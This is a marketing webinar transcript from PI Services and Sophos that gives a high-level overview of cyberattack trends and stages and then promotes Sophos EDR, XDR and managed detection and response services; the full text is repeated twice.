Sophos Cybersecurity: Opt for Peace of Mind in Cybersecurity
Welcome everyone to this webinar, “Opt for Peace of Mind in Cybersecurity.” I’m Frédéric REVEL from PI Services, working as a Business Engineer, and I’m joined by Gilles SARQUIZ, Pre-Sales Engineer at Sophos. I’ll begin with a brief introduction to PI Services to give you a bit of context.
PI Services has been operating for over 25 years as architects and managers of Microsoft-based infrastructures. We work across all types of environments—on-premises, cloud, or hybrid—from endpoints to servers, including collaborative tools, identity, and of course, security, which is today’s focus with this webinar.
We offer a comprehensive and cross-functional vision, enabling us to support you from the early stages of your project through to deployment and ongoing managed support services. This includes helping you choose the right solutions, designing the architecture, and conducting assessments and scoping studies.
We also assist your teams with implementation and integration of solutions and infrastructures, ensuring a full handover through skills transfer and technical documentation. Finally, we offer support services for your infrastructure via several contract options, which I’ll now outline.
Focusing on our Managed Services, we offer three tailor-made service types:
Full or partial outsourcing of your IT infrastructure under operational maintenance contracts,
Support contracts for level 2 and level 3 incident resolution and advisory,
On-demand services for specific or one-off requirements.
These three pillars can be combined within a single contract to cover infrastructure, endpoints, networks, and security—especially with Sophos solutions—allowing us to support you in both attack prevention and incident resolution. And on that note, I’ll now hand over to Gilles.
Thank you, Frédéric. Good morning everyone. I’m Gilles SARQUIZ, Pre-Sales Engineer at Sophos.
Today, as Frédéric mentioned, we’ll explore Sophos’ offering in partnership with PI Services, who are certified Sophos partners. We’ll first look at the evolution of cyberattacks, based on our 2023 Threat Report, before diving into our solutions.
Just briefly, Sophos is the leading European-born cybersecurity vendor for businesses. Founded in 1985 in Oxford, England, we now operate globally with over 4,000 employees. In France, we have around 50 staff, including 12 technical support engineers who speak French and are available during standard French business hours. Additionally, we offer 24/7 global support.
Our go-to-market model is indirect: Sophos sells to distributors, who in turn supply trained and certified partners like PI Services.
Our presence is backed by a global network of Sophos Labs—threat intelligence centres monitoring emerging threats and distributing updates—as well as research and development teams worldwide. Sophos has grown through acquisitions, evolving from traditional antivirus to a full ecosystem of protection for networks, endpoints, mobiles, and beyond.
Threat Landscape Overview
The 2023 Threat Report, based on Sophos Labs’ global telemetry and client data, is publicly available. Key observations include:
Geopolitical events shaping attack strategies,
Rising ransomware sophistication,
Cybercrime industrialisation,
Credential theft as a key tactic,
Widespread use of legitimate tools by attackers (e.g., pentesting utilities),
Malware now targeting mobile and IoT devices—not just PCs.
On average, Sophos detects over 650,000 new malware samples per day, many of which are unique or targeted variants. This makes signature-based detection outdated, which is why Sophos has relied on AI and behavioural analysis since 2016.
Over 75% of malware seen is detected only once, which implies targeted attacks. Nearly 50% of breaches exploit known or unknown vulnerabilities, highlighting the importance of patch management and secure configurations. Detection of these vulnerabilities takes on average 280 days, leaving organisations exposed for long periods.
Attack Methodology
Many threats are now perpetrated by active attackers—humans operating malware remotely to adapt and bypass defences. These targeted operations involve several stages:
Reconnaissance – Researching the target, identifying weak points.
Weaponisation – Creating tailored malicious payloads.
Delivery – Via phishing, malicious websites, USB drives, etc.
Exploitation – Running malware to exploit a vulnerability.
Installation – Establishing persistence on the system.
Command & Control (C2) – Maintaining external communication for further instructions.
Action on Objectives – Whether data theft, encryption, or disruption.
Defences can counter most phases post-delivery. Key mitigations include user training, email/web filtering, endpoint protection, behavioural detection, and log analysis for anomalies—this is where advanced detection and response come in.
Common Attacker Tactics
Topical Lures – Phishing emails often exploit current events (e.g., COVID-19 or war in Ukraine) to trick users into clicking malicious links.
Cybercrime-as-a-Service – Attackers now rent phishing kits, buy access credentials, or use ready-made ransomware platforms with management dashboards, making attacks more accessible to non-technical criminals.
Ransomware Trends – The most common strains evolve yearly (e.g., LockBit in 2022). Attackers adapt rapidly, and their tools now resemble professional IT software in complexity.
Pentest Tools Misused – Legitimate tools like Mimikatz, Metasploit, or PowerSploit are frequently used by attackers for credential dumping and privilege escalation.
Living Off the Land – Attackers use built-in OS tools (e.g., PowerShell) to stay under the radar. It’s vital to monitor or restrict these tools where possible.
Security Recommendations
Assume compromise and plan accordingly.
Backups must be isolated and regularly tested.
Layered protection across endpoints, servers, and network.
Don’t pay ransoms—you may not recover data and only incentivise more attacks.
Use human expertise alongside tools—alerts alone are not enough.
Create and rehearse an incident response plan. You need clear procedures during an attack to avoid panic and mistakes.
From Passive to Proactive Security
Traditional antivirus is reactive and binary—it blocks known threats and misses unknown ones. Sophos advocates for EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response), to:
Investigate suspicious activity,
Hunt for hidden threats,
Respond proactively to incidents.
XDR expands beyond endpoints to include telemetry from:
Firewalls,
Email gateways,
Cloud services,
Mobile devices,
Third-party tools (via connectors).
These data are centralised and correlated in Sophos’ Data Lake, enriched by AI and threat intel, enabling advanced threat detection and response.
Sophos MDR: Managed Detection & Response
Sophos MDR is our fully managed, 24/7 cybersecurity-as-a-service, combining:
Expert threat hunters,
AI-powered tools,
Defined incident response playbooks.
Since 2019, Sophos MDR has:
15,000+ customers in 121 countries,
6 global SOCs (2 in Europe),
500+ specialists dedicated to MDR.
Gartner and G2 both rank us as leaders in MDR and cybersecurity.
MDR offers different service levels:
Threat Advisor – Monitoring and alerting only.
Sophos MDR – Monitoring + incident containment.
Sophos MDR Complete – Adds full remediation, root cause analysis, and a $1M breach warranty.
Example Incidents
Spear Phishing
Email lure leads to malware execution.
MDR isolates the device, removes malware, and reports actions.
MDR Complete also tracks the original email, checks for spread, and advises on identity reset.
Ransomware via VPN
Stolen credentials used to spread ransomware via PsExec.
MDR blocks the process, isolates servers, disables accounts.
MDR Complete investigates source IPs, scans for persistence, and suggests resetting domain-wide credentials and enabling MFA.
Sophos XDR Integrations
Beyond Sophos’ native products, we can ingest security data from:
Microsoft 365 & Defender via Graph Security API,
Other vendors like Palo Alto, Fortinet, Okta, etc.,
Custom logs or generic security tools.
We also offer:
Network Detection Appliances (virtual sensors on port mirroring),
Log retention for up to 1 year for long-term investigations.
Conclusion
Sophos MDR delivers:
Proven technology (Intercept X, Firewall, etc.),
Unified management via the Sophos Central platform,
Industry-leading detection and response times (under 40 minutes),
Seamless integration across environments—even with third-party tools.
If you’d like to learn more or see a demonstration tailored to your infrastructure, feel free to contact PI Services or Sophos.
Welcome everyone to this webinar, “Opt for Peace of Mind in Cybersecurity.” I’m Frédéric REVEL from PI Services, working as a Business Engineer, and I’m joined by Gilles SARQUIZ, Pre-Sales Engineer at Sophos. I’ll begin with a brief introduction to PI Services to give you a bit of context.
PI Services has been operating for over 25 years as architects and managers of Microsoft-based infrastructures. We work across all types of environments—on-premises, cloud, or hybrid—from endpoints to servers, including collaborative tools, identity, and of course, security, which is today’s focus with this webinar.
We offer a comprehensive and cross-functional vision, enabling us to support you from the early stages of your project through to deployment and ongoing managed support services. This includes helping you choose the right solutions, designing the architecture, and conducting assessments and scoping studies.
We also assist your teams with implementation and integration of solutions and infrastructures, ensuring a full handover through skills transfer and technical documentation. Finally, we offer support services for your infrastructure via several contract options, which I’ll now outline.
Focusing on our Managed Services, we offer three tailor-made service types:
Full or partial outsourcing of your IT infrastructure under operational maintenance contracts,
Support contracts for level 2 and level 3 incident resolution and advisory,
On-demand services for specific or one-off requirements.
These three pillars can be combined within a single contract to cover infrastructure, endpoints, networks, and security—especially with Sophos solutions—allowing us to support you in both attack prevention and incident resolution. And on that note, I’ll now hand over to Gilles.
Thank you, Frédéric. Good morning everyone. I’m Gilles SARQUIZ, Pre-Sales Engineer at Sophos.
Today, as Frédéric mentioned, we’ll explore Sophos’ offering in partnership with PI Services, who are certified Sophos partners. We’ll first look at the evolution of cyberattacks, based on our 2023 Threat Report, before diving into our solutions.
Just briefly, Sophos is the leading European-born cybersecurity vendor for businesses. Founded in 1985 in Oxford, England, we now operate globally with over 4,000 employees. In France, we have around 50 staff, including 12 technical support engineers who speak French and are available during standard French business hours. Additionally, we offer 24/7 global support.
Our go-to-market model is indirect: Sophos sells to distributors, who in turn supply trained and certified partners like PI Services.
Our presence is backed by a global network of Sophos Labs—threat intelligence centres monitoring emerging threats and distributing updates—as well as research and development teams worldwide. Sophos has grown through acquisitions, evolving from traditional antivirus to a full ecosystem of protection for networks, endpoints, mobiles, and beyond.
Threat Landscape Overview
The 2023 Threat Report, based on Sophos Labs’ global telemetry and client data, is publicly available. Key observations include:
Geopolitical events shaping attack strategies,
Rising ransomware sophistication,
Cybercrime industrialisation,
Credential theft as a key tactic,
Widespread use of legitimate tools by attackers (e.g., pentesting utilities),
Malware now targeting mobile and IoT devices—not just PCs.
On average, Sophos detects over 650,000 new malware samples per day, many of which are unique or targeted variants. This makes signature-based detection outdated, which is why Sophos has relied on AI and behavioural analysis since 2016.
Over 75% of malware seen is detected only once, which implies targeted attacks. Nearly 50% of breaches exploit known or unknown vulnerabilities, highlighting the importance of patch management and secure configurations. Detection of these vulnerabilities takes on average 280 days, leaving organisations exposed for long periods.
Attack Methodology
Many threats are now perpetrated by active attackers—humans operating malware remotely to adapt and bypass defences. These targeted operations involve several stages:
Reconnaissance – Researching the target, identifying weak points.
Weaponisation – Creating tailored malicious payloads.
Delivery – Via phishing, malicious websites, USB drives, etc.
Exploitation – Running malware to exploit a vulnerability.
Installation – Establishing persistence on the system.
Command & Control (C2) – Maintaining external communication for further instructions.
Action on Objectives – Whether data theft, encryption, or disruption.
Defences can counter most phases post-delivery. Key mitigations include user training, email/web filtering, endpoint protection, behavioural detection, and log analysis for anomalies—this is where advanced detection and response come in.
Common Attacker Tactics
Topical Lures – Phishing emails often exploit current events (e.g., COVID-19 or war in Ukraine) to trick users into clicking malicious links.
Cybercrime-as-a-Service – Attackers now rent phishing kits, buy access credentials, or use ready-made ransomware platforms with management dashboards, making attacks more accessible to non-technical criminals.
Ransomware Trends – The most common strains evolve yearly (e.g., LockBit in 2022). Attackers adapt rapidly, and their tools now resemble professional IT software in complexity.
Pentest Tools Misused – Legitimate tools like Mimikatz, Metasploit, or PowerSploit are frequently used by attackers for credential dumping and privilege escalation.
Living Off the Land – Attackers use built-in OS tools (e.g., PowerShell) to stay under the radar. It’s vital to monitor or restrict these tools where possible.
Security Recommendations
Assume compromise and plan accordingly.
Backups must be isolated and regularly tested.
Layered protection across endpoints, servers, and network.
Don’t pay ransoms—you may not recover data and only incentivise more attacks.
Use human expertise alongside tools—alerts alone are not enough.
Create and rehearse an incident response plan. You need clear procedures during an attack to avoid panic and mistakes.
From Passive to Proactive Security
Traditional antivirus is reactive and binary—it blocks known threats and misses unknown ones. Sophos advocates for EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response), to:
Investigate suspicious activity,
Hunt for hidden threats,
Respond proactively to incidents.
XDR expands beyond endpoints to include telemetry from:
Firewalls,
Email gateways,
Cloud services,
Mobile devices,
Third-party tools (via connectors).
These data are centralised and correlated in Sophos’ Data Lake, enriched by AI and threat intel, enabling advanced threat detection and response.
Sophos MDR: Managed Detection & Response
Sophos MDR is our fully managed, 24/7 cybersecurity-as-a-service, combining:
Expert threat hunters,
AI-powered tools,
Defined incident response playbooks.
Since 2019, Sophos MDR has:
15,000+ customers in 121 countries,
6 global SOCs (2 in Europe),
500+ specialists dedicated to MDR.
Gartner and G2 both rank us as leaders in MDR and cybersecurity.
MDR offers different service levels:
Threat Advisor – Monitoring and alerting only.
Sophos MDR – Monitoring + incident containment.
Sophos MDR Complete – Adds full remediation, root cause analysis, and a $1M breach warranty.
Example Incidents
Spear Phishing
Email lure leads to malware execution.
MDR isolates the device, removes malware, and reports actions.
MDR Complete also tracks the original email, checks for spread, and advises on identity reset.
Ransomware via VPN
Stolen credentials used to spread ransomware via PsExec.
MDR blocks the process, isolates servers, disables accounts.
MDR Complete investigates source IPs, scans for persistence, and suggests resetting domain-wide credentials and enabling MFA.
Sophos XDR Integrations
Beyond Sophos’ native products, we can ingest security data from:
Microsoft 365 & Defender via Graph Security API,
Other vendors like Palo Alto, Fortinet, Okta, etc.,
Custom logs or generic security tools.
We also offer:
Network Detection Appliances (virtual sensors on port mirroring),
Log retention for up to 1 year for long-term investigations.
Conclusion
Sophos MDR delivers:
Proven technology (Intercept X, Firewall, etc.),
Unified management via the Sophos Central platform,
Industry-leading detection and response times (under 40 minutes),
Seamless integration across environments—even with third-party tools.
If you’d like to learn more or see a demonstration tailored to your infrastructure, feel free to contact PI Services or Sophos.